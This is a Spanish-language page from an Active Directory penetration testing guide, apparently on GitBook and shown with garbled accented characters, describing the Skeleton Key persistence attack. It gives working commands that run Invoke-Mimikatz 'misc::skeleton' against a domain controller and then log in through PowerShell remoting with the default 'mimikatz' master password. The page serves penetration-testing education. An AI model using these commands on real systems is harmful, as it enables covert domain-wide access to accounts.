馃數
Active Directory Penetration Testing
  • Inicio
  • General
    • Recursos de aprendizaje
    • Herramientas
  • Recolecci贸n de informaci贸n y enumeraci贸n
    • Bypass protecciones PowerShell scripts
    • LLMNR/NBT-NS poisoning
    • Enumeraci贸n no autenticada
      • Enumeraci贸n de usuarios y grupos
      • Enumeraci贸n de pol铆tica de contrase帽as
    • Password spraying
    • Enumeraci贸n autenticada
      • BloodHound
      • Domain Name System (DNS)
      • Enumeraci贸n de dominios
      • Enumeraci贸n de usuarios, grupos y computadoras
      • Enumeraci贸n de recursos compartidos
      • Enumeraci贸n de pol铆tica de contrase帽as
      • Enumeraci贸n de Group Policy Object (GPO)
      • Enumeraci贸n de Access Control List (ACL)
      • Enumeraci贸n de relaciones de confianza de dominio
  • Movimiento lateral
    • User hunting
    • Microsoft SQL Server (MSSQL)
    • PowerShell remoting
    • Remote Desktop Protocol (RDP)
    • Server Message Block (SMB)
    • Windows Remote Management (WinRM)
    • Pass the Hash (PtH)
    • Pass the Ticket (PtT)
  • Escalamiento de privilegios de dominio
    • Configuraciones incorrectas
    • Credential dumping
    • Usuarios y grupos
    • ASREPRoast
    • Kerberoast
    • DCSync
    • Unconstrained delegation
    • Constrained delegation
  • Escalamiento de privilegios en relaciones de confianza de dominio
    • Kerberoast
    • Foreign group membership
    • SID History
  • Persistencia
    • Golden Ticket
    • Silver Ticket
    • Skeleton Key
    • Directory Services Restore Mode (DSRM)
  • Vulnerabilidades
    • NoPac
    • PrintNightmare
Con tecnolog铆a de GitBook
En esta p谩gina
  • Descripci贸n
  • Invoke-Mimikatz

驴Te fue 煤til?

  1. Persistencia

Skeleton Key

Descripci贸n

Skeleton Key es un ataque de persistencia que se inyecta en el proceso LSASS (Local Security Authority Subsystem Service) y crea una contrase帽a maestra que funcionar谩 para cualquier cuenta de dominio. Las contrase帽as existentes seguir谩n funcionando, por lo que es dif铆cil saber si se ha producido este ataque. Al reiniciar el controlador de dominio se eliminar谩n los cambios realizados por dicho ataque, el cual, para poder perpetrarlo se debe tener una cuenta con privilegios de administrador de dominio.

Invoke-Mimikatz

1) Ejecuci贸n de ataque Skeleton Key utilizando Invoke-Mimikatz.

Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DC01.ACME.LOCAL>

2) PowerShell remoting al host administrador del dominio con usuario Administrator y contrase帽a por defecto mimikatz.

$UserPassword = ConvertTo-SecureString "mimikatz" -AsPlainText -Force
$UserCredential = New-Object System.Management.Automation.PSCredential ("<ACME.LOCAL>\Administrator", $UserPassword)
Enter-PSSession -ComputerName <DC01.ACME.LOCAL> -Credential $UserCredential
AnteriorSilver TicketSiguienteDirectory Services Restore Mode (DSRM)

脷ltima actualizaci贸n hace 2 a帽os

驴Te fue 煤til?